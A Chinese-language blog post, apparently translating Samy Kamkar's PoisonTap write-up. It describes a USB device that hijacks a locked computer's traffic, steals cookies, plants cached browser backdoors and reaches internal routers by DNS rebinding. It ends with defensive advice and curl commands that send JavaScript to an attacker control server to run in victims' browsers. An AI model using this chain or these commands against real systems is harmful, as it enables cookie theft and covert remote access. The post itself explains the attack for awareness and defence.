关于长亭空间
超值服务提供卓越产品
当poison Tap插入被锁定/密码保护的电脑时:
详细的视频介绍:
[embed]http://v.youku.com/v_show/id_XMTgyMjc3NDU2OA==.html[/embed]
poison Tap 绕过以下安全机制:
PoisonTap
PoisonTap是由 价值5$的Raspberry Pi Zero构建的,除了微型USB电缆和microSD卡之外不需要任何其它额外组件,但PoisonTap可以在其它可以模拟USB小部件(如USB Armory和LAN Turtle)的设备上工作。
(incredible HTML5 canvas animation by Ara) Video Demo: https://youtu.be/Aatp5gCskvk Point of Contact: @SamyKamkar // https://samy.pl Released: November 16, 2016 Source code and download: https://github.com/samyk/poisontapHow PoisonTap Works
PoisonTap通过利用机器和网络的各种机制(包括USB / Thunderbolt,DHCP,DNS和HTTP)中现有的信任来产生级联效应,从而产生信息渗透,网络访问和半后门的安装的雪球效应。
简而言之,PoisonTap执行以下操作:
网络攻击
1.网络劫持攻击者将PoisonTap(例如武装强化的Raspberry Pi Zero)插入锁定的计算机(即使计算机受密码保护) 2.PoisonTap模拟以太网设备(例如,USB / Thunderbolt) - 默认情况下,Windows,OS X和Linux识别以太网设备,自动将其作为低优先级网络设备加载并在其上执行DHCP请求,即使机器被锁定或密码保护 3.PoisonTap响应DHCP请求并为机器提供IP地址,但是DHCP响应的目的是告诉机器整个IPv4空间(0.0.0.0 - 255.255.255.255)是PoisonTap本地网络的一部分,而不是子网(如192.168.0.0 - 192.168.0.255)
抓取Cookie
1.只要Web浏览器正在运行后台,每打开一个页面,服务器后台都要进行http请求(例如加载新广告,将数据发送到分析平台,或者只是继续跟踪您的网络运动)
2.根据此HTTP请求,由于所有流量都退出到PoisonTap设备,PoisonTap DNS欺骗即时返回其自己的地址,导致HTTP请求命中PoisonTap Web服务器(Node.js)
3.当Node web服务器接收到请求时,PoisonTap会响应一个可以解释为HTML或Javascript的响应,这两个都正确执行(许多网站将在后台请求中加载HTML或JS) 4.然后,HTML / JS-agnostic页面会生成许多隐藏的iframe,每个iframe跨越不同的Alexa-top-100万个域
基于web后门的远程访问
1.虽然PoisonTap正在生产数千个iframe,迫使浏览器加载每个iframe,但这些iframe不仅仅是空白页面,而是无限缓存的HTML + Javascript后门 2.即使用户当前未登录,由于PoisonTap在每个域上强制缓存这些后门,后门被绑定到该域,使攻击者能够使用域的Cookie并在将来启动同源请求,即使用户当前未登录
3.页面的实际响应是HTML和Javascript的组合,其产生持续的WebSocket到攻击者的web服务器(通过因特网,而不是PoisonTap设备)
[caption id="attachment_92146" align="aligncenter" width="628"]
OLYMPUS DIGITAL CAMERA[/caption]
内部路由器后门和远程访问
1.PoisonTap不能劫持是真正的网络接口的实际LAN子网(例如,如果用户的wifi子网是192.168.0.x,这个网络不受影响),但... 2.PoisonTap在一个特别主机上强制缓存后门,具体地,目标路由器的IP后面加上“.ip.samy.pl”,例如。 192.168.0.1.ip.samy.pl,基本上产生持久的DNS重绑定攻击
3.DNS绑定和DNS重绑的安全性由于耗尽DNS绑定表而被绕过。由于之前做出的成千上万次的请求,DNS不需要重新绑定,使得该攻击可以持续很长时间(感谢Matt Austin分享这种攻击思路!) 4.现在,后门强制连接到http://192.168.0.1.ip.samy.pl/PoisonTap,任何对192.168.0.1.ip.samy.pl的请求都将命中非固定的IP地址,导致192.168.0.1 以解析,直接指向路由器 5.这意味着如果通过后门远程在iframe中加载192.168.0.1.ip.samy.pl/PoisonTap主机,你可以对内部路由器上的任何其他页面执行AJAX GET / POST,完全远程,从而允许远程访问内部路由器
Recap of the DNS server:
[ip.addy].ip.samy.pl normally responds with [ip.addy] 192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record) [ip.addy].pin.ip.samy.pl temporarily (~5 seconds) points *.ip.samy.pl to [ip.addy] 1.0.0.1.pin.ip.samy.pl -> 1.0.0.1 192.168.0.1.ip.samy.pl -> 1.0.0.1 (A record, short TTL) (after ~5 seconds) 192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record)
基于web远程访问的其它后门
1.此外,PoisonTap替代了成千上万的常见的,基于CDN的Javascript文件,如谷歌和jQuery CDNs。在确定安全的代码加上一个后门,可以让攻击者访问任何域时加载受感染的基于CDN的Javascript文件 2.由于每个域上都留有后门,即使当前受害者没有对当前域任何开放任何窗口,攻击者几乎可以远程强制后端浏览器在任何主域上执行同源请求(AJAX GET / POST) 3.当受害者访问网站时,后门现在可以在任何额外的网站上使用这些受感染的,基于HTTP的CDN Javascript框架
安全预防posion Tap
服务端安全
如果你正在运行一个web服务器,以下是安全防御posion Tap的样例: 1.仅使用HTTPS,至少为认证和已认证的内容使用HTTPS 2.老实说,你应该单独使用HTTPS,并始终将HTTP内容重定向到HTTPS,防止用户通过HTTP提交被欺骗提供的凭据或其它PII 3.确保在Cookie上启用安全标记,防止通过HTTP泄漏HTTPS Cookie 4.使用HSTS防止HTTPS降级攻击
桌面安全
1.拿粘合剂封住USB和Thunderbolt端口效果不错(与第3条类似,不过这里是物理封锁---小编注) 2.每次离开机器时关闭浏览器,不过这是完全不切实际的 3.禁用USB / Thunderbolt端口也是有效的,虽然也不切实际 4.锁定计算机没有任何效果,因为网络和USB堆栈在机器锁定期间操作。但是,计算机进入加密睡眠模式(例如,FileVault2 +深度睡眠)可以解决大多数问题,因为内存需要内存需要秘钥解密,即使你的浏览器被唤醒。它仍然不能提出任何请求。
Code下载地址:
Source code: https://github.com/samyk/poisontap文件分解
在poisontap中有许多文件,它们用于不同的方面。 以下是文件列表:
# pop alert to victim curl 'http://samy.pl:1337/exec?alert("muahahahaha")' # to set a cookie on victim curl 'http://samy.pl:1337/exec?document.cookie="key=value"' # to force victim to load a url via ajax (note, jQuery is stored inside the backdoor) curl 'http://samy.pl:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",function(d){console.log(d)})'